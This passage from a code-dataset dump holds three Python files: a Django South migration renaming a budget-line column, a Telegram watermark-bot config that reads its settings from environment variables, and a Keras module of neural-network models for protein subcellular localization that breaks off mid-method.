| forks | truffe2/accounting_main/migrations/0010_auto__del_field_budgetline_compte__add_field_budgetline_account.py | JonathanCollaud/truffe2 | 5cbb055ac1acf7e7dc697340618fcb56c67fbd91 | ["BSD-2-Clause"] | 13 | 2016-12-31T14:22:09.000Z | 2020-12-27T19:43:19.000Z |

```python
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Renaming field 'BudgetLine.compte_id' to 'BudgetLine.account_id'
db.rename_column(u'accounting_main_budgetline', 'compte_id', 'account_id')
def backwards(self, orm):
# Renaming field 'BudgetLine.account_id' back to 'BudgetLine.compte_id'
db.rename_column(u'accounting_main_budgetline', 'account_id', 'compte_id')
models = {
u'accounting_core.account': {
'Meta': {'unique_together': "(('name', 'accounting_year'), ('account_number', 'accounting_year'))", 'object_name': 'Account'},
'account_number': ('django.db.models.fields.CharField', [], {'max_length': '10'}),
'accounting_year': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['accounting_core.AccountingYear']"}),
'category': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['accounting_core.AccountCategory']"}),
'deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'visibility': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'accounting_core.accountcategory': {
'Meta': {'unique_together': "(('name', 'accounting_year'),)", 'object_name': 'AccountCategory'},
'accounting_year': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['accounting_core.AccountingYear']"}),
'deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'order': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'parent_hierarchique': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['accounting_core.AccountCategory']", 'null': 'True', 'blank': 'True'})
},
u'accounting_core.accountingyear': {
'Meta': {'object_name': 'AccountingYear'},
'deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'end_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
'start_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'0_preparing'", 'max_length': '255'}),
'subvention_deadline': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'})
},
u'accounting_core.costcenter': {
'Meta': {'unique_together': "(('name', 'accounting_year'), ('account_number', 'accounting_year'))", 'object_name': 'CostCenter'},
'account_number': ('django.db.models.fields.CharField', [], {'max_length': '10'}),
'accounting_year': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['accounting_core.AccountingYear']"}),
'deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'unit': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['units.Unit']"})
},
u'accounting_main.accountingerror': {
'Meta': {'object_name': 'AccountingError'},
'accounting_year': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['accounting_core.AccountingYear']"}),
'costcenter': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['accounting_core.CostCenter']"}),
'deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'initial_remark': ('django.db.models.fields.TextField', [], {}),
'linked_line': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['accounting_main.AccountingLine']", 'null': 'True', 'blank': 'True'}),
'linked_line_cache': ('django.db.models.fields.CharField', [], {'max_length': '4096'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'0_drafting'", 'max_length': '255'}),
'unit': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['units.Unit']"})
},
u'accounting_main.accountingerrorlogging': {
'Meta': {'object_name': 'AccountingErrorLogging'},
'extra_data': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'object': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'logs'", 'to': u"orm['accounting_main.AccountingError']"}),
'what': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'when': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'who': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['users.TruffeUser']"})
},
u'accounting_main.accountingerrormessage': {
'Meta': {'object_name': 'AccountingErrorMessage'},
'author': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['users.TruffeUser']"}),
'error': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['accounting_main.AccountingError']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'message': ('django.db.models.fields.TextField', [], {}),
'when': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'})
},
u'accounting_main.accountingline': {
'Meta': {'object_name': 'AccountingLine'},
'account': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['accounting_core.Account']"}),
'accounting_year': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['accounting_core.AccountingYear']"}),
'costcenter': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['accounting_core.CostCenter']"}),
'current_sum': ('django.db.models.fields.DecimalField', [], {'max_digits': '20', 'decimal_places': '2'}),
'date': ('django.db.models.fields.DateField', [], {}),
'deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'document_id': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'input': ('django.db.models.fields.DecimalField', [], {'max_digits': '20', 'decimal_places': '2'}),
'output': ('django.db.models.fields.DecimalField', [], {'max_digits': '20', 'decimal_places': '2'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'0_imported'", 'max_length': '255'}),
'text': ('django.db.models.fields.CharField', [], {'max_length': '2048'}),
'tva': ('django.db.models.fields.DecimalField', [], {'max_digits': '20', 'decimal_places': '2'}),
'unit': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['units.Unit']"})
},
u'accounting_main.accountinglinelogging': {
'Meta': {'object_name': 'AccountingLineLogging'},
'extra_data': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'object': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'logs'", 'to': u"orm['accounting_main.AccountingLine']"}),
'what': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'when': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'who': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['users.TruffeUser']"})
},
u'accounting_main.budget': {
'Meta': {'object_name': 'Budget'},
'accounting_year': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['accounting_core.AccountingYear']"}),
'costcenter': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['accounting_core.CostCenter']"}),
'deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'0_draft'", 'max_length': '255'}),
'unit': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['units.Unit']"})
},
u'accounting_main.budgetline': {
'Meta': {'object_name': 'BudgetLine'},
'account': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['accounting_core.Account']"}),
'amount': ('django.db.models.fields.DecimalField', [], {'max_digits': '20', 'decimal_places': '2'}),
'budget': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['accounting_main.Budget']"}),
'description': ('django.db.models.fields.CharField', [], {'max_length': '250'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
u'accounting_main.budgetlogging': {
'Meta': {'object_name': 'BudgetLogging'},
'extra_data': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'object': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'logs'", 'to': u"orm['accounting_main.Budget']"}),
'what': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'when': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'who': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['users.TruffeUser']"})
},
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'units.unit': {
'Meta': {'object_name': 'Unit'},
'deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'id_epfl': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True', 'blank': 'True'}),
'is_commission': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_equipe': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_hidden': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'parent_hierarchique': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['units.Unit']", 'null': 'True', 'blank': 'True'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'})
},
u'users.truffeuser': {
'Meta': {'object_name': 'TruffeUser'},
'adresse': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'body': ('django.db.models.fields.CharField', [], {'default': "'.'", 'max_length': '1'}),
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '255'}),
'email_perso': ('django.db.models.fields.EmailField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Group']"}),
'iban_ou_ccp': ('django.db.models.fields.CharField', [], {'max_length': '128', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
'mobile': ('django.db.models.fields.CharField', [], {'max_length': '25', 'blank': 'True'}),
'nom_banque': ('django.db.models.fields.CharField', [], {'max_length': '128', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Permission']"}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'})
}
}
complete_apps = ['accounting_main']
```

avg_line_length 80.949749 | max_line_length 195 | alphanum_fraction 0.574337

Record 6: hexsha 794d8e12a242f72a52dbb030f118ea36e4bdd16c | size 1,508 | ext py | lang Python

| event | repo_path | repo_name | head_hexsha | licenses | count | min_datetime | max_datetime |
|---|---|---|---|---|---|---|---|
| stars | configs.py | AppleBotz/WM_bot | 36311af327f24126b0d202f5e5b16145bb1a00d3 | ["MIT"] | null | null | null |
| issues | configs.py | AppleBotz/WM_bot | 36311af327f24126b0d202f5e5b16145bb1a00d3 | ["MIT"] | null | null | null |
| forks | configs.py | AppleBotz/WM_bot | 36311af327f24126b0d202f5e5b16145bb1a00d3 | ["MIT"] | null | null | null |

```python
# (c) @AbirHasan2005
# Don't Forget That I Made This!
# So Give Credits!
import os
class Config(object):
BOT_TOKEN = os.environ.get("BOT_TOKEN")
API_ID = int(os.environ.get("API_ID", 12345))
API_HASH = os.environ.get("API_HASH")
STREAMTAPE_API_PASS = os.environ.get("STREAMTAPE_API_PASS", "NoNeed")
STREAMTAPE_API_USERNAME = os.environ.get("STREAMTAPE_API_USERNAME", "NoNeed")
LOG_CHANNEL = int(os.environ.get("LOG_CHANNEL"))
UPDATES_CHANNEL = os.environ.get("UPDATES_CHANNEL", None)
DOWN_PATH = os.environ.get("DOWN_PATH", "./downloads")
PRESET = os.environ.get("PRESET", "ultrafast")
OWNER_ID = int(os.environ.get("OWNER_ID", 5295523409))
CAPTION = "By @BLVCKCARDS's"
BOT_USERNAME = os.environ.get("BOT_USERNAME", "WMCards_Videobot")
DATABASE_URL = os.environ.get("DATABASE_URL")
BROADCAST_AS_COPY = bool(os.environ.get("BROADCAST_AS_COPY", False))
ALLOW_UPLOAD_TO_STREAMTAPE = bool(os.environ.get("ALLOW_UPLOAD_TO_STREAMTAPE", True))
USAGE_WATERMARK_ADDER = """
Hi, I am Video Watermark Adder Bot!
**How to Add a Watermark to a Video?**
**Usage:** First Send a JPG Image/Logo, then send any Video. Better to add a watermark to an MP4 or MKV Video.
__Note: I can only process one video at a time. As my server is Heroku, my health is not good. If you have any issues with Adding Watermark to a Video, then please Report at [Support Group](https://t.me/SharkUserbot).__
Designed by @BLVCKCARDS's
"""
PROGRESS = """
Percentage : {0}%
Done ✅: {1}
Total 🌀: {2}
Speed 🚀: {3}/s
ETA 🕰: {4}
"""
```

avg_line_length 35.069767 | max_line_length 219 | alphanum_fraction 0.728117

Record 7: hexsha 794d8e8ed8437f9ed74a7fa971afe6b7f787b607 | size 32,929 | ext py | lang Python

| event | repo_path | repo_name | head_hexsha | licenses | count | min_datetime | max_datetime |
|---|---|---|---|---|---|---|---|
| stars | utils/models.py | ClaudiaRaffaelli/Protein-subcellular-localization | 38a40c7389ee717954c254114959368223a55e43 | ["MIT"] | null | null | null |
| issues | utils/models.py | ClaudiaRaffaelli/Protein-subcellular-localization | 38a40c7389ee717954c254114959368223a55e43 | ["MIT"] | null | null | null |
| forks | utils/models.py | ClaudiaRaffaelli/Protein-subcellular-localization | 38a40c7389ee717954c254114959368223a55e43 | ["MIT"] | 1 | 2021-08-25T07:50:43.000Z | 2021-08-25T07:50:43.000Z |

```python
import numpy as np
import tensorflow as tf
from tensorflow.keras.models import Sequential
from tensorflow.keras import layers, optimizers
from tensorflow import keras
import matplotlib.pyplot as plt
import itertools
from sklearn.metrics import classification_report, confusion_matrix, matthews_corrcoef
import math
class Attention(tf.keras.layers.Layer):
""" Implementing a layer that does attention according to Bahdanau style """
def __init__(self, units):
super(Attention, self).__init__()
# W1 weight of the previously hidden state(hidden_size x hidden_size)
self.W1 = tf.keras.layers.Dense(units)
# W2 weight for all the encoder hidden states
self.W2 = tf.keras.layers.Dense(units)
self.V = tf.keras.layers.Dense(1)
def call(self, inputs, hidden):
# 'hidden' (h_t) is expanded over the time axis to prepare it for the addition
# that follows. hidden will always be the last hidden state of the RNN.
# (in seq2seq in would have been the current state of the decoder step)
# 'features' (h_s) are all the hidden states of the encoder.
hidden_with_time_axis = tf.expand_dims(hidden, 1)
# Bahdanau additive style to compute the score:
# score = v_a * tanh(W_1*h_t + W_2*h_s)
score = tf.nn.tanh(self.W1(inputs) + self.W2(hidden_with_time_axis))
attention_weights = tf.nn.softmax(self.V(score), axis=1)
context_vector = attention_weights * inputs
context_vector = tf.reduce_sum(context_vector, axis=1)
return context_vector, attention_weights
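# A minimal smoke test of the Attention layer above (added for illustration,
# not part of the original file; the shapes are assumptions, not project
# settings). Random encoder states and a random last hidden state should yield
# a context vector of shape (batch, units) and weights of shape (batch, seq, 1).
if __name__ == "__main__":
    attn = Attention(units=64)
    features = tf.random.normal((2, 10, 64))  # all encoder hidden states (h_s)
    hidden = tf.random.normal((2, 64))        # last hidden state (h_t)
    context, weights = attn(features, hidden)
    print(context.shape, weights.shape)       # (2, 64) (2, 10, 1)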
class CustomModels:
def __init__(self, seq_len, n_feat, n_hid, n_class, lr, drop_prob, n_filt=None, drop_hid=None, random_search=False,
n_membrane_class=3, batch_size=None):
"""
Hyperparameters of the network:
:param seq_len: length of sequence
:param n_feat: number of features encoded
:param n_hid: number of hidden neurons. It can be an integer, or an hp.Int, i.e. a range used during optimization.
:param n_class: number of classes to output
:param lr: learning rate. It can be a float, or an hp.Float, i.e. a range used during optimization.
:param drop_prob: hidden-neuron dropout probability. It can be a float, or an hp.Float, i.e. a range used during optimization.
:param n_filt: (optional) number of filters. It can be an int, or an hp.Int, i.e. a range used during optimization.
:param drop_hid: (optional) dropout of hidden neurons
"""
self.seq_len = seq_len
self.n_feat = n_feat
self.n_hid = n_hid
self.n_class = n_class
self.lr = lr
self.drop_prob = drop_prob
self.n_filt = n_filt
self.drop_hid = drop_hid
self.model = None
self.confusion_mat = None
self.random_search = random_search
self.n_membrane_class = n_membrane_class
self.batch_size = batch_size
self.classes_subcellular = ['Cell membrane', 'Cytoplasm', 'ER', 'Golgi apparatus', 'Lysosome + Vacuole',
'Mitochondrion', 'Nucleus', 'Peroxisome', 'Plastid', 'Extracellular']
self.classes_membrane = ['Membrane', 'Soluble', 'Unknown']
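# Hypothetical usage sketch (added for illustration; the values are
# assumptions, not the authors' settings):
#   builder = CustomModels(seq_len=400, n_feat=20, n_hid=256, n_class=10,
#                          lr=1e-3, drop_prob=0.5)
#   ffn = builder.create_FFN()  # compiled keras.Model with two softmax heads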
def create_FFN(self, X_train=None, y_train=None, X_val=None, y_val=None, params=None):
"""
Building the network by defining its architecture: input layer, dense layer, output layer
:param params: optional hyperparameter container. A HyperParameters instance contains information about both the
search space and the current values of each hyperparameter.
"""
if self.random_search:
self.drop_prob = params['drop_prob']
self.n_hid = params['n_hid']
self.lr = params['lr']
# Define the layers of the network
inputs = keras.Input(shape=(self.seq_len, self.n_feat))
x = layers.Flatten()(inputs)
x = layers.Dense(units=self.n_hid, activation='relu')(x)
x = layers.Dropout(self.drop_prob)(x)
l_out_subcellular = layers.Dense(self.n_class, activation="softmax", name="subcellular")(x)
l_out_membrane = layers.Dense(self.n_membrane_class, activation="softmax", name="membrane")(x)
self.model = keras.Model(inputs, [l_out_subcellular, l_out_membrane])
# Calculate the prediction and network loss for the training set and update the network weights:
self.model.compile(loss=['categorical_crossentropy', 'categorical_crossentropy'],
optimizer=optimizers.Adam(learning_rate=self.lr, clipnorm=3), metrics=['accuracy'])
# with clipnorm the gradients will be clipped when their L2 norm exceeds this value.
if not self.random_search:
return self.model
else:
history = self.model.fit(X_train, [y_train[0], y_train[1]], epochs=120, batch_size=params['batch_size'],
validation_data=(X_val, [y_val[0], y_val[1]]), shuffle=True)
return history, self.model
def create_CNN(self, X_train=None, y_train=None, X_val=None, y_val=None, params=None):
"""
Building the network by defining its architecture: input layer, two convolutional layers with max pooling,
a dense layer and an output layer.
:param X_train: (optional) train features for random search
X_val: (optional) validation features for random search
y_train: (optional) train labels for random search
y_val: (optional) validation labels for random search
params: optional hyperparameter container. A HyperParameters instance contains information about both the
search space and the current values of each hyperparameter.
"""
if self.random_search:
self.drop_prob = params['drop_prob']
self.n_hid = params['n_hid']
self.lr = params['lr']
self.n_filt = params['n_filt']
# Build model
inputs = keras.Input(shape=(self.seq_len, self.n_feat))
l_permute = layers.Permute((2, 1))(inputs)
l_conv_a = layers.Conv1D(self.n_filt, 3, strides=1, padding="same", activation="relu",
data_format='channels_first')(l_permute)
l_conv_b = layers.Conv1D(self.n_filt, 5, strides=1, padding="same", activation="relu",
data_format='channels_first')(l_permute)
l_conc = tf.keras.layers.Concatenate(axis=1)([l_conv_a, l_conv_b])
l_conv_final = layers.Conv1D(self.n_filt * 2, 3, strides=1, padding="same", activation="relu",
data_format='channels_first')(l_conc)
l_reshu = layers.Permute((2, 1))(l_conv_final)
final_max_pool = layers.MaxPooling1D(5)(l_reshu)
final_max_pool = layers.Flatten()(final_max_pool)
l_dense = layers.Dense(self.n_hid, activation="relu")(final_max_pool)
l_dense = layers.Dropout(self.drop_prob)(l_dense)
l_out_subcellular = layers.Dense(self.n_class, activation="softmax", name="subcellular")(l_dense)
l_out_membrane = layers.Dense(self.n_membrane_class, activation="softmax", name="membrane")(l_dense)
self.model = keras.Model(inputs, [l_out_subcellular, l_out_membrane])
# with clipnorm the gradients will be clipped when their L2 norm exceeds this value.
self.model.compile(loss=['categorical_crossentropy', 'categorical_crossentropy'],
optimizer=optimizers.Adam(learning_rate=self.lr, clipnorm=3), metrics=['accuracy'])
if not self.random_search:
return self.model
else:
history = self.model.fit(X_train, [y_train[0], y_train[1]], epochs=120, batch_size=params['batch_size'],
validation_data=(X_val, [y_val[0], y_val[1]]), shuffle=True)
return history, self.model
def create_LSTM(self, X_train=None, y_train=None, X_val=None, y_val=None, params=None):
"""
Building the network by defining its architecture: input layer, a bidirectional LSTM, a dense layer and an
output layer
:param X_train: (optional) train features for random search
X_val: (optional) validation features for random search
y_train: (optional) train labels for random search
y_val: (optional) validation labels for random search
params: optional hyperparameter container. A HyperParameters instance contains information about both the
search space and the current values of each hyperparameter.
"""
if self.random_search:
self.drop_prob = params['drop_prob']
self.n_hid = params['n_hid']
self.lr = params['lr']
# Build model defining the layers
# Define input
l_input = keras.Input(shape=(self.seq_len, self.n_feat))
# Bidirectional LSTM layer, taking only the last hidden state (only_return_final)
l_fwd = layers.LSTM(units=self.n_hid, activation="tanh", return_sequences=False)(l_input)
l_bwd = layers.LSTM(units=self.n_hid, activation="tanh", return_sequences=False, go_backwards=True)(l_input)
# Concatenate both layers
l_conc_lstm = tf.keras.layers.Concatenate(axis=1)([l_fwd, l_bwd])
# Dense layer with ReLu activation function
l_dense = layers.Dense(self.n_hid * 2, activation="relu")(l_conc_lstm)
# Output layer with a Softmax activation function. Note that we include a dropout layer
l_dropout = layers.Dropout(self.drop_prob)(l_dense)
l_out_subcellular = layers.Dense(self.n_class, activation="softmax", name="subcellular")(l_dropout)
l_out_membrane = layers.Dense(self.n_membrane_class, activation="softmax", name="membrane")(l_dropout)
self.model = keras.Model(l_input, [l_out_subcellular, l_out_membrane])
# with clipnorm the gradients will be clipped when their L2 norm exceeds this value.
self.model.compile(loss=['categorical_crossentropy', 'categorical_crossentropy'],
optimizer=optimizers.Adam(learning_rate=self.lr, clipnorm=3), metrics=['accuracy'])
if not self.random_search:
return self.model
else:
history = self.model.fit(X_train, [y_train[0], y_train[1]], epochs=120, batch_size=params['batch_size'],
validation_data=(X_val, [y_val[0], y_val[1]]), shuffle=True)
return history, self.model
def create_CNN_LSTM(self, X_train=None, y_train=None, X_val=None, y_val=None, params=None):
"""
Building the network by defining its architecture: input layer, two convolutional layers, a bidirectional LSTM,
a dense layer and an output layer
:param X_train: (optional) train features for random search
X_val: (optional) validation features for random search
y_train: (optional) train labels for random search
y_val: (optional) validation labels for random search
params: optional hyperparameter container. A HyperParameters instance contains information about both the
search space and the current values of each hyperparameter.
"""
if self.random_search:
self.drop_prob = params['drop_prob']
self.n_hid = params['n_hid']
self.lr = params['lr']
self.n_filt = params['n_filt']
# Build model defining the layers
# Define input
l_input = keras.Input(shape=(self.seq_len, self.n_feat))
l_permute = layers.Permute((2, 1))(l_input)
# Convolutional layers with filter size 3 and 5
l_conv_a = layers.Conv1D(self.n_filt, 3, strides=1, padding="same", activation="relu",
data_format='channels_first')(
l_permute)
l_conv_b = layers.Conv1D(self.n_filt, 5, strides=1, padding="same", activation="relu",
data_format='channels_first')(
l_permute)
# The output of the two convolution is concatenated
l_conc = tf.keras.layers.Concatenate(axis=1)([l_conv_a, l_conv_b])
# Building a second CNN layer
l_conv_final = layers.Conv1D(
self.n_filt * 2, 3, strides=1, padding="same", activation="relu", data_format='channels_first')(l_conc)
# Second permute layer
l_reshu = layers.Permute((2, 1))(l_conv_final)
        # Bidirectional LSTM built from forward and backward LSTM layers, keeping only the last hidden state (return_sequences=False)
l_fwd = layers.LSTM(units=self.n_hid, activation="tanh", return_sequences=False)(l_reshu)
l_bwd = layers.LSTM(units=self.n_hid, activation="tanh", return_sequences=False, go_backwards=True)(l_reshu)
# Concatenate both layers
l_conc_lstm = tf.keras.layers.Concatenate(axis=1)([l_fwd, l_bwd])
# Dense layer with ReLu activation function
l_dense = layers.Dense(self.n_hid * 2, activation="relu")(l_conc_lstm)
# Output layer with a Softmax activation function. Note that we include a dropout layer
l_dropout = layers.Dropout(self.drop_prob)(l_dense)
l_out_subcellular = layers.Dense(self.n_class, activation="softmax", name="subcellular")(l_dropout)
l_out_membrane = layers.Dense(self.n_membrane_class, activation="softmax", name="membrane")(l_dropout)
self.model = keras.Model(l_input, [l_out_subcellular, l_out_membrane])
# with clipnorm the gradients will be clipped when their L2 norm exceeds this value.
self.model.compile(loss=['categorical_crossentropy', 'categorical_crossentropy'],
optimizer=optimizers.Adam(learning_rate=self.lr, clipnorm=3), metrics=['accuracy'])
if not self.random_search:
return self.model
else:
history = self.model.fit(X_train, [y_train[0], y_train[1]], epochs=120, batch_size=params['batch_size'],
validation_data=(X_val, [y_val[0], y_val[1]]), shuffle=True)
return history, self.model
def create_LSTM_Attention(self, X_train=None, y_train=None, X_val=None, y_val=None, params=None):
"""
Building the network by defining its architecture: an input layer, a bidirectional LSTM, an attention layer,
a dense layer and an output layer.
        :param X_train: (optional) train features for random search
        :param X_val: (optional) validation features for random search
        :param y_train: (optional) train labels for random search
        :param y_val: (optional) validation labels for random search
        :param params: optional hyperparameter container. A HyperParameters instance contains
            information about both the search space and the current values of each hyperparameter.
"""
if self.random_search:
self.drop_prob = params['drop_prob']
self.n_hid = params['n_hid']
self.lr = params['lr']
# Build model
inputs = keras.Input(shape=(self.seq_len, self.n_feat))
# encoders LSTM
l_lstm, forward_h, forward_c, backward_h, backward_c = layers.Bidirectional \
(layers.LSTM(self.n_hid, dropout=self.drop_prob, return_sequences=True, return_state=True,
activation="tanh"))(inputs)
state_h = layers.Concatenate()([forward_h, backward_h])
state_c = layers.Concatenate()([forward_c, backward_c])
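        # NOTE: state_c is concatenated for symmetry but is not consumed below
        # (here and in the later attention variants); the attention layer only
        # conditions on the hidden state state_h.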
# Set up the attention layer
context_vector, self.attention_weights = Attention(self.n_hid * 2)(inputs=l_lstm, hidden=state_h)
l_drop = layers.Dropout(self.drop_prob)(context_vector)
l_out_subcellular = layers.Dense(self.n_class, activation="softmax", name="subcellular")(l_drop)
l_out_membrane = layers.Dense(self.n_membrane_class, activation="softmax", name="membrane")(l_drop)
self.model = keras.Model(inputs, [l_out_subcellular, l_out_membrane])
# with clipnorm the gradients will be clipped when their L2 norm exceeds this value.
self.model.compile(loss=['categorical_crossentropy', 'categorical_crossentropy'],
optimizer=optimizers.Adam(learning_rate=self.lr, clipnorm=3), metrics=['accuracy'])
if not self.random_search:
return self.model
else:
history = self.model.fit(X_train, [y_train[0], y_train[1]], epochs=120, batch_size=params['batch_size'],
validation_data=(X_val, [y_val[0], y_val[1]]), shuffle=True)
return history, self.model
def create_CNN_LSTM_Attention(self, X_train=None, y_train=None, X_val=None, y_val=None, params=None):
"""
Building the network by defining its architecture: an input layer, two convolutional layers, a bidirectional
LSTM, an attention layer, a dense layer and an output layer.
        :param X_train: (optional) train features for random search
        :param X_val: (optional) validation features for random search
        :param y_train: (optional) train labels for random search
        :param y_val: (optional) validation labels for random search
        :param params: optional hyperparameter container. A HyperParameters instance contains
            information about both the search space and the current values of each hyperparameter.
"""
if self.random_search:
self.drop_prob = params['drop_prob']
self.n_hid = params['n_hid']
self.lr = params['lr']
self.n_filt = params['n_filt']
# Build model
inputs = keras.Input(shape=(self.seq_len, self.n_feat))
l_permute = layers.Permute((2, 1))(inputs)
l_conv_a = layers.Conv1D(self.n_filt, 3, strides=1, padding="same", activation="relu",
data_format='channels_first')(l_permute)
